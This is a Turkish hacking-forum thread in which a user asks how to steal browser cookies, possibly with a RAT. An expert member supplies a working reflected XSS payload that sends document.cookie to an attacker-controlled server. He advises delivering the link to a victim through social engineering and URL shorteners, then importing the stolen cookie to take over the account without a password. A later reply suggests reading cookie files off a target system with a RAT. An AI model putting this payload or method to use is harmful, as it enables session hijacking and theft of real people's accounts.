Cookie Stealer

KeoAltidore

KeoAltidore

Üye
20 Tem 2020
102
0
Sql
Merhaba, cookieler hakkında birazcik bilgi verebilir misiniz? Cookieleri nasıl çalabilirim? Veya bunun için bir rat yapabilir miyim?
 
Çözüm
Safak-Bey
KeoAltidore' Alıntı:
Yanıtınız için çok çok teşekkür ederim. Fakat benim dediğim site ile değil de normal bir rat atarak klasörlerinden cookielerine erişemez miyiz?
Genişletmek için tıkla ...
Cookie ler metin dosyasında saklanır. Bu sebeple içerikleri görülebilir (bazı siteler şifreleyerek saklar). İnternette "cookies folder location in windows x" şeklinde aratarak cookie bilgilerinin saklandığı dosyaların dizinlerini bulabilir ve hedef sistemde de aynı yolu kullanarak bilgiler elde edilebilir.
Tarihe göre sırala Oylara göre sırala
Safak-Bey

Safak-Bey

Uzman üye
9 Ara 2021
1,795
1,989
Gereken Yerde
Cokkie ler bir web sitesine kayıt olup hesabınıza girdikten sonra web site tarafından size özel atanan oturum bilgisidir ve bu bilgi dosyalara yazılır, bu sayede aynı web sayfasını ziyaret ettiğinizde bilgilerinizi yeniden girmeye gerek duymazsınız.

Hedefin Cokkie bilgisini çalmak için en basitinden XSS zafiyetinden yararlanabilirsiniz. Örnek olarak;
http ://vulnerable.webapp/index.php?name=<script>document.location="http: //kendiwebsunucumuz.com/cookie.php?c="+document.cookie;</script> gibi açıklı url ye javascript kodu girerseniz ve sosyal mühendislik ile bunu hedef kişiye atarsanız(link kısaltma ile inandırıcılık arttırılabilir). Hedef kişi linke tıkladığı zaman cookie bilgisini kendi sunucumuza aktarabiliriz. Elde edilen cookie bilgisini EditThisCookie adlı eklenti ile hedefin cookie bilgisini girerek hedef kişinin kullanıcı adı ve parolasına ihtiyaç duymadan hesaba erişebiliriz. Session Hijacking Saldırısını araştırabilirsiniz.
 
Son düzenleme:
Oyla 0 Downvote
KeoAltidore

KeoAltidore

Üye
20 Tem 2020
102
0
Sql
SHADOW GHOST' Alıntı:
benim cerezleri caldılar zaten sinirliyim o konuda , bide tht de konu açıp beni banlattılar eski hesabımda yaptılar
Genişletmek için tıkla ...
Senin adına üzüldüm, ben daha çok milleti çalmak değil de test etmek denemek istiyorum. Bilgin var mı bu konu da?

Safak-Bey' Alıntı:
Cokkie ler bir web sitesine kayıt olup hesabınıza girdikten sonra web site tarafından size özel atanan oturum bilgisidir ve bu bilgi dosyalara yazılır, bu sayede aynı web sayfasını ziyaret ettiğinizde bilgilerinizi yeniden girmeye gerek duymazsınız.

Hedefin Cokkie bilgisini çalmak için en basitinden XSS zafiyetinden yararlanabilirsiniz. Örnek olarak;
http ://vulnerable.webapp/index.php?name=<script>document.location="http: //kendiwebsunucumuz.com/cookie.php?c="+document.cookie;</script> gibi açıklı url ye javascript kodu girerseniz ve sosyal mühendislik ile bunu hedef kişiye atarsanız(link kısaltma ile inandırıcılık arttırılabilir). Hedef kişi linke tıkladığı zaman cookie bilgisini kendi sunucumuza aktarabiliriz. Elde edilen cookie bilgisini EditThisCookie adlı eklenti ile hedefin cookie bilgisini girerek hedef kişinin kullanıcı adı ve parolasına ihtiyaç duymadan hesaba erişebiliriz. Session Hijacking Saldırısını araştırabilirsiniz.
Genişletmek için tıkla ...
Yanıtınız için çok çok teşekkür ederim. Fakat benim dediğim site ile değil de normal bir rat atarak klasörlerinden cookielerine erişemez miyiz?
 
Oyla 0 Downvote
Safak-Bey

Safak-Bey

Uzman üye
9 Ara 2021
1,795
1,989
Gereken Yerde
KeoAltidore' Alıntı:
Yanıtınız için çok çok teşekkür ederim. Fakat benim dediğim site ile değil de normal bir rat atarak klasörlerinden cookielerine erişemez miyiz?
Genişletmek için tıkla ...
Cookie ler metin dosyasında saklanır. Bu sebeple içerikleri görülebilir (bazı siteler şifreleyerek saklar). İnternette "cookies folder location in windows x" şeklinde aratarak cookie bilgilerinin saklandığı dosyaların dizinlerini bulabilir ve hedef sistemde de aynı yolu kullanarak bilgiler elde edilebilir.
 
Oyla 0 Downvote
Çözüm
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.